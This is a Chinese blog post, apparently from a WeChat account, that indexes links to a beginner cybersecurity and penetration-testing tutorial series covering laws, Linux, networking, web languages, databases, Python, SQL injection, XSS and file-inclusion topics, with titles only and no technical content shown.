这也是耗费了大白近四个月的时间，吐血整理，文章非常非常长，觉得有用的话，希望粉丝朋友帮忙点个**「分享」**「收藏」******「在看」****「赞」**

**网络安全/渗透测试法律法规**必知必会****  

今天大白就帮想学黑客/网络安全技术的朋友们入门必须先了解法律法律。

[【网络安全零基础入门必知必会】网络安全行业分析报告（01）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247495837&idx=1&sn=c2b10dde53495ebc1edbc9af2cf34ed5&chksm=ce9c3055f9ebb9433d3f94c0e37117aa2876b6524313f0d03f671234dac12a978cad15b80667&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】什么是黑客、白客、红客、极客、脚本小子？（02）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247495861&idx=1&sn=5ac3c4392fc40d2e6fc65eb539adab07&chksm=ce9c307df9ebb96b097488475b8db651369f65255afcea2282b9f30f1e54de85a9d8b78cd1c5&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】网络安全市场分类（03）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247495905&idx=1&sn=affb85487008e12fd33580a29f9c9099&chksm=ce9c3029f9ebb93f9a2e3e279325852379a0c07f7d3a3beb0c034c13b0e26d07499eb61ba7fb&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】常见的网站攻击方式（04）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247495925&idx=1&sn=120fdef836aafac9bbd40d20a1eed387&chksm=ce9c303df9ebb92bd45bce8218fa1a6aebb1a971e9b8552e24c3033c4050faadab77eccf1b32&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】网络安全专业术语全面解析（05）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247495952&idx=1&sn=4f832e30231e8bb16b3947c40240e8e1&chksm=ce9c31d8f9ebb8ce7b48efd6cc6037693e1197bcdc355afc4958d783657fbe1921b7849a8362&scene=21#wechat_redirect)  

[【网络安全入门必知必会】《中华人民共和国网络安全法》（06）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247495976&idx=1&sn=a551f81583e22f05cc99e5ca8437952a&chksm=ce9c31e0f9ebb8f6586a6e410229ea369c74e5de19c8826f360321a06b5c677d4331fd6a8a40&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《计算机信息系统安全保护条例》（07）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247495997&idx=1&sn=2fa0a2e09deddd25252b9226aadb645e&chksm=ce9c31f5f9ebb8e3013113610b1371c30f17260a65cf33b58fdd1ad28ca3ddf65d63f341f988&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《中国计算机信息网络国际联网管理暂行规定》（08）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496017&idx=1&sn=ce8bcda17ed3fb47c5acb40cf718af6b&chksm=ce9c3199f9ebb88f1c5b5bb4b76085f3a3aa85d4e54349912e3c5a634ce90980652e463796d9&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《计算机信息网络国际互联网安全保护管理办法》（09）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496038&idx=1&sn=9670d13f0ab0edf7fb5c5413751b2311&chksm=ce9c31aef9ebb8b8786bfc1c791772a7d57c3100ff71f7615ff4dcfdf72e6e5e1d30d384f369&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《互联网信息服务管理办法》（10）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496058&idx=1&sn=c298206eead1d3a9b77ced672015892e&chksm=ce9c31b2f9ebb8a4b1f9ea6218e0da181cd2a77913fcd09c330182bfd55892041670ab43b7df&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《计算机信息系统安全专用产品检测和销售许可证管理办法》（11）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496098&idx=1&sn=d6c5478cdc27ad3d983a404d51fc79ea&chksm=ce9c316af9ebb87c79d925b608129279712615f19cc6c7d2e92a611a75c67c9287af22b1f9cb&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《通信网络安全防护管理办法》（12）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496118&idx=1&sn=8504c00d830b4826dbde8c438f1ea00f&chksm=ce9c317ef9ebb86889dc52feb3c7d5ce6384b0a5d8031c853e7e65ae53624197f4cf6bd8fe58&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《中华人民共和国国家安全法》（13）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496138&idx=1&sn=c849b650b9755912d36a91eabc12c2a8&chksm=ce9c3102f9ebb814525f7008aafbb926784d09ed0216ae0ff802d45d185fa3103a345520d585&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《中华人民共和国数据安全法》（14）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496158&idx=1&sn=9430be73eaa4778492f78ea16ab1aeff&chksm=ce9c3116f9ebb8003067ec234f26d7d98ed438c2d760bc4467a3c9ec75c94d232f04ab7bbc2a&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《中华人民共和国个人信息保护法》（15）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496178&idx=1&sn=b53294a4f2a2aafeae63e5767b596484&chksm=ce9c313af9ebb82c2c287bc12224197e02087e6ccaf4edcf10b707d24380938fa0ecd57f243a&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】《网络产品安全漏洞管理规定》（16）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496198&idx=1&sn=5bb92e8e855566a6d0893e5aec8dd428&chksm=ce9c32cef9ebbbd8054b955d03195ca22266ae24cf9d424eef407438fdb54f4cfcb6ced55893&scene=21#wechat_redirect)

****网络安全/渗透测试linux入门**必知必会******

[【网络安全零基础入门必知必会】什么是Linux？Linux系统的组成与版本？什么是命令（01）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496223&idx=1&sn=c273196a3a1bd75c9eb9f59c8aae4e12&chksm=ce9c32d7f9ebbbc156dde7b8c4ae47c79036cfe0ead3729f52df930d9284d65055d84643b444&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】VMware下载安装，使用VMware新建虚拟机，远程管理工具（02）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496277&idx=1&sn=3947dd4013609252224e48ef181e5646&chksm=ce9c329df9ebbb8b0461301f4efecb97f1f91c576d34bfa33d16f372bc01d7df06022efa955e&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】VMware常用操作指南（非常详细）零基础入门到精通，收藏这一篇就够了（03）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496325&idx=1&sn=e98fb11828c7dbecc0ec1ee7b8d7af9d&chksm=ce9c324df9ebbb5bf3c59711448dfd9585a93d85f0f090c15faa736e74a309ef4e0a697efc1d&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】CentOS7安装流程步骤教程（非常详细）零基入门到精通，收藏这一篇就够了（04）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496488&idx=1&sn=1b9ead814b402aeff5544f64725addaa&chksm=ce9c33e0f9ebbaf61a953c9c932600f8b8dd1e80728443f1258415beea4edef510f9318be4a3&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】Linux系统目录结构详细介绍（05）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496511&idx=1&sn=610229fc0b7318d9d4e941674c31981b&chksm=ce9c33f7f9ebbae185b37a5429dd44126f2c424e81e1e63c9605cfceca6c7b588f8a565e2e5e&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】Linux 命令大全（非常详细）零基础入门到精通，收藏这一篇就够了（06）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496542&idx=1&sn=374ac14bb4e3252df2ee77bf2db495c6&chksm=ce9c3396f9ebba80467e67d29ab08c5bc874fd37cbc5571ec211ee8ba18a07bbae2eb08d279f&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】linux安全加固（非常详细）零基础入门到精通，收藏这一篇就够了（07）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496567&idx=1&sn=465fa6feefc937f7f1aacccc294b0908&chksm=ce9c33bff9ebbaa98619b10f044cafa7b740596fb3a32a29ab3b517bfefe21c1830431d402c4&scene=21#wechat_redirect)

**网络安全/渗透测试****计算机网络入门**必知必会****

[【网络安全零基础入门必知必会】TCP/IP协议深入解析（非常详细）零基础入门到精通，收藏这一篇就够了（01）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496687&idx=1&sn=f52a42401a210bc1f3c7193ae0a2f0c6&chksm=ce9c3327f9ebba312114f79d336d765fad781a635d164859ff4608bb8ccf3abea51807889092&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】什么是HTTP数据包&Http数据包分析（非常详细）零基础入门到精通，收藏这一篇就够了（02）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496729&idx=1&sn=905ad0de51fdf33ff11ec73bf9ee2f39&chksm=ce9c34d1f9ebbdc7b99af2656e6e24bd868b9478089e415b2df8e4bcbdf9b37295f4720d6bfc&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】计算机网络---子网划分、子网掩码和网关（非常详细）零基础入门到精通，收藏这一篇就够了（03）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496757&idx=1&sn=7290325450450dd157fdb969c9f5aa07&chksm=ce9c34fdf9ebbdeb237b9f21ba7d9f3c1bf1501c763d5d235feeca67b6acb263d2a1ff91153a&scene=21#wechat_redirect)

**网络安全**/渗透测试**入门之HTML入门必知必会**

[【网络安全零基础入门必知必会】什么是HTML&HTML基本结构&HTML基本使用（非常详细）零基础入门到精通，收藏这一篇就够了1](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496815&idx=1&sn=bed137c7e904a5413096b104b1ac33e2&chksm=ce9c34a7f9ebbdb10d6f7573e58cf752dde126b290e2cde5d05e5346e88faf8ecdafe0b039b6&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】VScode、PhpStorm的安装使用、Php的环境配置，零基础入门到精通，收藏这一篇就够了2](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496854&idx=1&sn=c9f9d655483e4d4b365ffe303f16b70a&chksm=ce9c345ef9ebbd48ad27756489d6005f9fbf8a58ec485231aff824d4303d2b1a36a3a0e19168&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】HTML之编写登录和文件上传（非常详细）零基础入门到精通，收藏这一篇就够了3](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496877&idx=1&sn=d5733d2381128bf25490296ac862e51a&chksm=ce9c3465f9ebbd73e0134d38c80e40df22ce54b652cea8e1359c6a966305fd672c2faa6263f9&scene=21#wechat_redirect)

**网络安全**/渗透测试**入门之Javascript入门必知必会**

[【网络安全零基础入门必知必会】Javascript语法基础（非常详细）零基础入门到精通，收藏这一篇就够了（01）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247496975&idx=1&sn=87d4ae5d36d2255f70e1b3d61eabd96a&chksm=ce9c35c7f9ebbcd12af27ef10d991c69a54415ec151ce44a156fb58d4a59d2f34c3a0247fb21&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】Javascript实现Post请求、Ajax请求、输出数据到页面、实现前进后退、文件上传（02）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497000&idx=1&sn=2042ffe0bb29a1bb45b84d79c825a0dc&chksm=ce9c35e0f9ebbcf6faaacbc1236a91d892c39b08f9dad2dd4bb54ac2cd45a9b80c8fb4b225ed&scene=21#wechat_redirect)

**网络安全**/渗透测试**入门之Shell入门必知必会**

【网络安全零基础入门必知必会】Shell编程基础入门（非常详细）零基础入门到精通，收藏这一篇就够了（第七章）

**网络安全**/渗透测试**入门之PHP入门必知必会**

[【网络安全零基础入门】PHP环境搭建、安装Apache、安装与配置MySQL（非常详细）零基础入门到精通，收藏这一篇就够（01）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497304&idx=1&sn=687d531e5ac56dfdb24b2f35fd42ffdd&chksm=ce9c3690f9ebbf86e62fb1c16e4e20ae01ded7b09349820524274c30033be0f6fa7998008690&scene=21#wechat_redirect)  

[【网络安全零基础入门】PHP基础语法（非常详细）零基础入门到精通，收藏这一篇就够了（02）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497337&idx=1&sn=9820faac8fa2cb0fcdfe425e670956c3&chksm=ce9c36b1f9ebbfa765608026c87657e91e5c2de6bcfd35e3bdcc25ec9fec8f8e7bfe8621d146&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】PHP+Bootstrap实现表单校验功能、PHP+MYSQL实现简单的用户注册登录功能（03）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497361&idx=1&sn=8daa626f9baf855b4fb49a7f1d1faf9b&chksm=ce9c3659f9ebbf4f03d751537d956442072a4ba77e6439d1895bfbc6f53a70826600cc81d9e6&scene=21#wechat_redirect)

**网络安全**/渗透测试**入门之MySQL入门必知必会**

[【网络安全零基础入门必知必会】MySQL数据库基础知识/安装（非常详细）零基础入门到精通，收藏这一篇就够了（01）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497454&idx=1&sn=55b988033df8e1de0a86633bbb0f085a&chksm=ce9c3626f9ebbf30cd72e46989196d51d7be104bdbbb185c0a406748b2ca392373c8937677e0&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】SQL语言入门（非常详细）零基础入门到精通，收藏这一篇就够了（02）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497474&idx=1&sn=2da55afa33dc9d07f60eb4d15b6ad439&chksm=ce9c37caf9ebbedcdf366736e12d5711932cf2c7d9890198aaad0254c3a24ac89c103b9aa0a2&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】MySQL函数使用大全（非常详细）零基础入门到精通，收藏这一篇就够了（03）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497532&idx=1&sn=3cacda64e30a04f6f2c62e99ea1955ad&chksm=ce9c37f4f9ebbee281f81a3dab2abd56cee5e004329e9972304b6865c5e9a65b4e896d11d4cc&scene=21#wechat_redirect)  

[【网络安全零基础入门必知必会】MySQL多表查询语法（非常详细）零基础入门到精通，收藏这一篇就够了（04）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497577&idx=1&sn=32cb9aba5acb2b2466da590a55a68a58&chksm=ce9c37a1f9ebbeb7fc4e67b3cf228f1b5387fa5969dd4e0848aba50932c979e807233cc036a5&scene=21#wechat_redirect)

****网络安全/渗透测试**入门之Python入门必知必会**

[**【网络安全零基础入门必知必会】之Python+Pycharm安装保姆级教程，Python环境配置使用指南，收藏这一篇就够了【1】**](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497664&idx=1&sn=3808eb8ec4747bfe166042f1d51cec94&chksm=ce9c3708f9ebbe1edf2ae70991699dca9a8cd797ac9187549d039c41ed2330b1ca90625d1eb5&scene=21#wechat_redirect)

**[【网络安全零基础入门必知必会】之Python编程入门教程（非常详细）零基础入门到精通，收藏这一篇就够了（2）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497683&idx=1&sn=1931c6c508e1784176481ce61bb5ea47&chksm=ce9c371bf9ebbe0d55f4faf9f8229f297d80394c15d3af7a607d66732b7c0ff6addd7ae4e1be&scene=21#wechat_redirect)**

[python开发之手写第一个python程序](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484512&idx=1&sn=f8d1b1e17de3dc8cfce414bb5d5e596a&chksm=ce9fc4a8f9e84dbe9009e9ec8395cd09a0161d9dcf157eed06b255e94468d9a4359ab6d4c45e&scene=21#wechat_redirect)  

[python开发笔记之变量](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484525&idx=1&sn=138e6360c2f7d5f8eb49a85bf78f5b49&chksm=ce9fc4a5f9e84db3c895f2e55b97f61ce5a38a2f1062408aacb57b97176964ccf252ce54a6da&scene=21#wechat_redirect)  

[python基础语法特征](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484529&idx=1&sn=51c235d8762e6bf54940fd8c01d7d6d2&chksm=ce9fc4b9f9e84daf70f8281a358384011cc4a56ebdd492684951caa2c1ebeda816b3b2d5da60&scene=21#wechat_redirect)  

[python开发数据类型](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484533&idx=1&sn=fd676c7553ffc352b86118763f8322fd&chksm=ce9fc4bdf9e84dab8b96ac1d0b859f50c124044b1f7cfc576d47924c10421a41680772164993&scene=21#wechat_redirect)  

[python开发笔记之程序交互](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484537&idx=1&sn=8880b41d6e19cdb67172d5d0c8833f89&chksm=ce9fc4b1f9e84da7c9d14b1723f14bcffe9bad09c261bc418b3ed62052dd760d9dd902e4ee3c&scene=21#wechat_redirect)  

[python入门教程之python开发学习笔记基本数据类型](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484542&idx=1&sn=3dbb452b39f7e5fca4b550ad4de64826&chksm=ce9fc4b6f9e84da0ec0a747a2d5e662ae311ff1d86e54b338865b39e50e470e6db8c3606ae7e&scene=21#wechat_redirect)  

[python入门教程之python开发笔记之格式化输出](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484547&idx=1&sn=930c6201eb368fd7f32b248427b18cd7&chksm=ce9fc44bf9e84d5d2d7e66e63c40143721070281bb6cae7f1583893f3b5a76ab83cd088ed3c2&scene=21#wechat_redirect)  

[python入门教程之python开发笔记基本运算符](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484622&idx=1&sn=a22945a10d2dd06e8b3fdcc7a757d017&chksm=ce9fc406f9e84d1056fcee72ed911adff00f256791b264d8cf2e32bce0423252c22214212a7e&scene=21#wechat_redirect)  

[python入门教程python开发基本流程控制if ... else](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484832&idx=1&sn=3afea7d129ca716892dbddbf6321ad94&chksm=ce9fc568f9e84c7e07dd219092940fd0e3e83e89d35a565fe70c9f5086f62c91655b32ba1a20&scene=21#wechat_redirect)  

[python入门教程之python开发笔记流程控制之循环](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484837&idx=1&sn=9bf0376659217ecb1837bdf11ad01696&chksm=ce9fc56df9e84c7b20108da99298518581eb2844a72a456d3154c657706d3914b95efcfd56de&scene=21#wechat_redirect)  

[python入门之Pycharm开发工具的使用](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484846&idx=1&sn=5f58bbe9ff931b8db6f2f4359b00a8c4&chksm=ce9fc566f9e84c70d84e330de30b01be19413b054e1e0f8504a32ed13af7c441f9d477536527&scene=21#wechat_redirect)  

[python入门教程之python字符编码转换](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484862&idx=1&sn=6cfc1ea4e1dc50e6ee7afe3726b51992&chksm=ce9fc576f9e84c6007ed48fc210998e0bfb6d4c56c4dd6bcdb0093221c2a00408e064907fcc6&scene=21#wechat_redirect)  

[python入门之python开发字符编码](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484869&idx=1&sn=d43faa84f5bade78541edaf521d96641&chksm=ce9fc50df9e84c1bdee8af48628312023c319ca0f7607eedbf46ef38c20d0617ff926ed45c4a&scene=21#wechat_redirect)  

[python入门之python开发基本数据类型数字](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484874&idx=1&sn=bc09e3a3f8bf62a54331a14f75025491&chksm=ce9fc502f9e84c14db9ded4e0f5930715436e970f2495c069cbe0976297228c5053cbe69cd2d&scene=21#wechat_redirect)  

[python入门python开发基本数据类型字符串](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484879&idx=1&sn=0d1ef7bcd99b56e36ea1d069bff4156c&chksm=ce9fc507f9e84c11d992f1b8568cb8cf68eb7917b0575580496c786d186ab90bd60d025a8d02&scene=21#wechat_redirect)  

[python入门python开发基本数据类型列表](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484884&idx=1&sn=b8cec9c26fe099f388c36eb7a42ce06d&chksm=ce9fc51cf9e84c0a62cc69e8e67810ea657518facc99609f05f39a45f1e7998e55d045ec508f&scene=21#wechat_redirect)  

[python入门python开发基本数据类型](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484888&idx=1&sn=2a66abff613a517f2d34d2b9744e7048&chksm=ce9fc510f9e84c06634ed742dea32619b181f9cd2de32e05747fc3484e32c709774d2730122c&scene=21#wechat_redirect)  

[python入门教程之python开发可变和不可变数据类型和hash](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484904&idx=1&sn=c5e6c755789159378a799ec49791a8ba&chksm=ce9fc520f9e84c3641894cc9a187f97ded03fbd29632c6088ac3530d452ae4b00bd8bf9446c3&scene=21#wechat_redirect)  

[python入门教程python开发字典数据类型](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484908&idx=1&sn=7849977618ae0d6eb1f4d521fdd9d718&chksm=ce9fc524f9e84c3219d2d26a845597f5edb40ac987790a6fd9030024559d726a6ae5e1a512bb&scene=21#wechat_redirect)  

[python入门之python开发笔记基本数据类型集合](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484917&idx=1&sn=447439c25ad3a93d448a5199ff5b115b&chksm=ce9fc53df9e84c2b147a2ed9b77a4dca6dc7b64320a1b673262f5e6c48d88f143246db9e63f4&scene=21#wechat_redirect)  

[python开发之collections模块](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484921&idx=1&sn=3e68722e47850fbd252e1f6420b27949&chksm=ce9fc531f9e84c275b6a0c85c321771fb79eeb9879a2fd56ad1997b97b77b60a71a7107e1bd0&scene=21#wechat_redirect)  

[python开发笔记之三元运算](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247484925&idx=1&sn=f514f3a56a43434422a7590ddb4fc0e4&chksm=ce9fc535f9e84c238d8461e6964bceba13ce9e97b1180eaa4c165105d05fa8af514d040826d0&scene=21#wechat_redirect)  

  

[【网络安全零基础入门必知必会】之10个python爬虫入门实例(非常详细)零基础入门到精通，收藏这一篇就够了（3）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497702&idx=1&sn=1da29fdaf5719c75366d8ec8599c456a&chksm=ce9c372ef9ebbe38c470f426a368d867ade3bb868c8b0c641aceaf5865facb3c12dae284f725&scene=21#wechat_redirect)

  

****网络安全/渗透测试**入门之SQL注入入门必知必会**

[【网络安全渗透测试零基础入门必知必会】之初识SQL注入（非常详细）零基础入门到精通，收藏这一篇就够了（1）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497745&idx=1&sn=9516adeda7ca41b3c63e5c624aa2e5f9&chksm=ce9c38d9f9ebb1cf0f0e87dcd5755e9b27100e2bddf869b9ac83f48bf055a2e8a4d50a743f3a&scene=21#wechat_redirect)  

[【网络安全渗透测试零基础入门必知必会】之SQL手工注入基础语法&工具介绍（2）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497771&idx=1&sn=f7263846478b039b712ac5abc1f328bd&chksm=ce9c38e3f9ebb1f54bdb021d601ea5a450ba0bdf28fb22528a578595c1382ddef083e6f00f4d&scene=21#wechat_redirect)

[【网络安全渗透测试零基础入门必知必会】之SQL注入实战（非常详细）零基础入门到精通，收藏这一篇就够了（3）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497801&idx=1&sn=cbf17e4778c0576fbddaebfebd1fabbf&chksm=ce9c3881f9ebb19707e220a8243539120bd1e382252a245b06e59f1d7ed16e29e5ee77563f58&scene=21#wechat_redirect)  

[【网络安全渗透测试零基础入门必知必会】之SQLmap安装&实战（非常详细）零基础入门到精通，收藏这一篇就够了（4）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497829&idx=1&sn=074030650579de4e6c04e1ce7481a322&chksm=ce9c38adf9ebb1bb746de18db8501874b4a16721c0b86c6acd07839a094733597e31bc281163&scene=21#wechat_redirect)  

[【网络安全渗透测试零基础入门必知必会】之SQL防御（非常详细）零基础入门到精通，收藏这一篇就够了（4）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497850&idx=1&sn=dcf582c09c11e895da9dd2051a6d82eb&chksm=ce9c38b2f9ebb1a4c1255f8262bd85d82d2240b12407e910e20705cac205894ffbc9a9d65b9e&scene=21#wechat_redirect)

****网络安全/渗透测试**入门之XSS攻击入门必知必会**

[【网络安全渗透测试零基础入门必知必会】之XSS攻击基本概念和原理介绍（非常详细）零基础入门到精通，收藏这一篇就够了（1）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497915&idx=1&sn=caad92fb7cc8e10d281a17e324dc250a&chksm=ce9c3873f9ebb165c2b10870c117dca698adc25e1fbbe86038713ee8a1ae3e8ef6051e168fb6&scene=21#wechat_redirect)  

[网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码（实战演示）零基础入门到精通收藏这一篇就够了（2）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247497975&idx=1&sn=5336bff0127ac65d4ccab2f7f7bafeaa&chksm=ce9c383ff9ebb129a39387164b0101e4b2eb0cd7b792a553feaf172889aa6bad60728d1a45f0&scene=21#wechat_redirect)

[【网络安全渗透测试零基础入门必知必会】之XSS攻击获取键盘记录（实战演示）零基础入门到精通收藏这一篇就够了（3）](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247498007&idx=1&sn=026b1fe95145ad986809998528c025da&chksm=ce9c39dff9ebb0c91eaea86d0df081ed2447d66fc7685cd478b527e8669550800a933ed12cee&scene=21#wechat_redirect)  

[【网络安全渗透测试零基础入门必知必会】之xss-platform平台的入门搭建（非常详细）零基础入门到精通，收藏这一篇就够了4](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247498047&idx=1&sn=dbfd898bb8ff2ba9512c582d81a1bcf5&chksm=ce9c39f7f9ebb0e1ce3217ac9edac46fe9d5743816d97cd676700de7c35ba2dfdcfba7d54a85&scene=21#wechat_redirect)  

[【网络安全渗透测试入门】之XSS漏洞检测、利用和防御机制XSS游戏（非常详细）零基础入门到精通，收藏这一篇就够了5](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247498097&idx=1&sn=845c502680b0083de7137274d46672b4&chksm=ce9c39b9f9ebb0aff95b717572550a16a35ce95eb5faaecffbc0899a7caae5231dbd442e6fca&scene=21#wechat_redirect)

****网络安全/渗透测试**入门文件上传攻击与防御入门必知必会**

[【网络安全渗透测试零基础入门必知必会】之什么是文件包含漏洞&分类（非常详细）零基础入门到精通，收藏这一篇就够了1](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247498207&idx=1&sn=343e0bd617a6c92f2982740419d36a77&chksm=ce9c3917f9ebb001e716b18d1b83ba3a100071fd0ff475f6cca4ef297407384d47479c1896c7&scene=21#wechat_redirect)  

[【网络安全渗透测试零基础入门必知必会】之cve实际漏洞案例解析（非常详细）零基础入门到精通， 收藏这一篇就够了2](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247498263&idx=1&sn=87fdb92aaff1a12de875415b71edd484&chksm=ce9c3adff9ebb3c94c5a290c625eef7976f058013e2f527c5fe275bf19b10c5e69fcb54ad7d9&scene=21#wechat_redirect)  

[【网络安全渗透测试零基础入门必知必会】之PHP伪协议精讲(文件包含漏洞)零基础入门到精通，收藏这一篇就够了3](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247498320&idx=1&sn=ba43587192c472f61c846757b56b1db7&chksm=ce9c3a98f9ebb38e1ca621a0477dba6e326d9256bfe31e3207fc73737892d6fef5f19b0ce548&scene=21#wechat_redirect)  

[【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程（非常详细）零基础入门到精通，收藏这一篇就够了4](http://mp.weixin.qq.com/s?__biz=Mzg2OTM0MTYwNw==&mid=2247498379&idx=1&sn=1cfccdb15987d14ac7427f75d3131f72&chksm=ce9c3a43f9ebb3558177c2cfbfcc55f66180b823e40d5f97a291da19e11caa320cd17f8a5919&scene=21#wechat_redirect)  

